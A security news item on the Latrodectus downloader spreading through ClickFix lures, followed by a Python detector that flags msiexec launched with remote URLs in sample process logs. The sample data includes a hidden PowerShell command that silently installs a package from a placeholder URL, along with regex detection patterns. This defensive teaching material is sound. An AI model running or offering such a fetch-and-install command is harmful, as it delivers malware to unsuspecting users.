Latrodectus, a relatively new malware downloader used to stage additional malicious payloads, is being delivered through a social-engineering technique known as ClickFix. The lure, hosted on compromised websites, tricks the visitor into copying a command and running it themselves, typically through PowerShell; that command fetches the payload and executes it in memory rather than dropping a conventional executable on disk, which removes the file-based artifacts that endpoint tools most readily inspect. The process launch, its command line and the outbound download remain observable, so "in memory" should not be read as "invisible." Latrodectus was also affected by a coordinated global law-enforcement operation that dismantled the infrastructure of several related malware families. Recommended mitigations include disabling, through policy, the specific Windows features the lure depends on to get the pasted command executed.
"The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News.
"When run by a user, these commands will attempt to install a file located at the remote URL using MSIExec, and then execute it in memory," Expel said.
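The behavior Expel describes above (a user-pasted PowerShell command that hands msiexec a remote URL) leaves a distinctive process-creation trail even though the payload itself runs in memory. The detection logic below is an added example written for this page, not code published by Expel or The Hacker News. It runs over constructed Sysmon-style process-creation events; the field names, the sample command lines, the example.invalid URL and the scoring heuristics are all assumptions made for the example, not indicators taken from the report:

```python
import json
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 field names), one JSON
# object per line. They are sample data for this example, not real telemetry.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    # 1: command pasted into the Run dialog (parent explorer.exe) that hides the
    #    window and hands msiexec a remote package URL
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "msiexec /q /i https://example.invalid/update.msi"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 2: the msiexec child spawned by that PowerShell one-liner
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i https://example.invalid/update.msi",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # 3: benign: a user double-clicking a locally downloaded installer
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec /i "C:\Users\bob\Downloads\setup.msi"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    # 4: benign: the Windows Installer service itself, started by services.exe
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V",
     "ParentImage": r"C:\Windows\System32\services.exe"},
])

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Windows Installer quiet/passive switches: /q, /qn, /qb, /qr, /qf, /quiet, /passive
QUIET_RE = re.compile(r"(?:^|\s)/(?:q[nbrf]?|quiet|passive)\b", re.IGNORECASE)
# PowerShell -w / -win / -window / -windowstyle hidden
HIDDEN_RE = re.compile(r"(?:^|\s)-w(?:in|indow|indowstyle)?\s+hidden\b", re.IGNORECASE)
# Parents that mean a human (or a script a human pasted) launched msiexec,
# rather than the Windows Installer service. Assumed list; tune per environment.
INTERACTIVE_PARENTS = {"explorer.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one JSON log line into a ProcessEvent (missing fields become empty strings)."""
    d = json.loads(line)
    return ProcessEvent(d.get("Image", ""), d.get("CommandLine", ""), d.get("ParentImage", ""))


def analyze(ev: ProcessEvent) -> list[str]:
    """Return the reasons this event looks like ClickFix-style msiexec abuse (empty if none)."""
    reasons = []
    image, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    if image == "msiexec.exe" and URL_RE.search(cl):
        reasons.append("msiexec pointed at a remote package URL")
        if QUIET_RE.search(cl):
            reasons.append("silent install switch suppresses the installer UI")
        if parent in INTERACTIVE_PARENTS:
            reasons.append(f"parent {parent}: launched from a shell or the Run dialog, not the Installer service")
    elif image in {"powershell.exe", "pwsh.exe"} and "msiexec" in cl.lower() and URL_RE.search(cl):
        reasons.append("PowerShell one-liner invoking msiexec against a remote URL")
        if HIDDEN_RE.search(cl):
            reasons.append("hidden window style")
        if parent == "explorer.exe":
            reasons.append("parent explorer.exe: consistent with a command pasted into the Run dialog")
    return reasons


def detect(log_text: str) -> list[dict]:
    """Scan newline-delimited JSON events; return one finding per suspicious event."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = analyze(ev)
        if reasons:
            findings.append({"line": n, "image": basename(ev.image), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"line {f['line']} ({f['image']}): " + "; ".join(f["reasons"]))
```

The rule keys on what the technique cannot avoid: msiexec being handed an http(s) URL, a silent switch, and an interactive parent (explorer.exe for the Run dialog, a shell for pasted commands) instead of services.exe. Events 1 and 2 are flagged; the locally downloaded installer and the Installer service's own instance stay quiet by design. Treat INTERACTIVE_PARENTS and the switch patterns as starting points to tune against your own baseline before alerting on them.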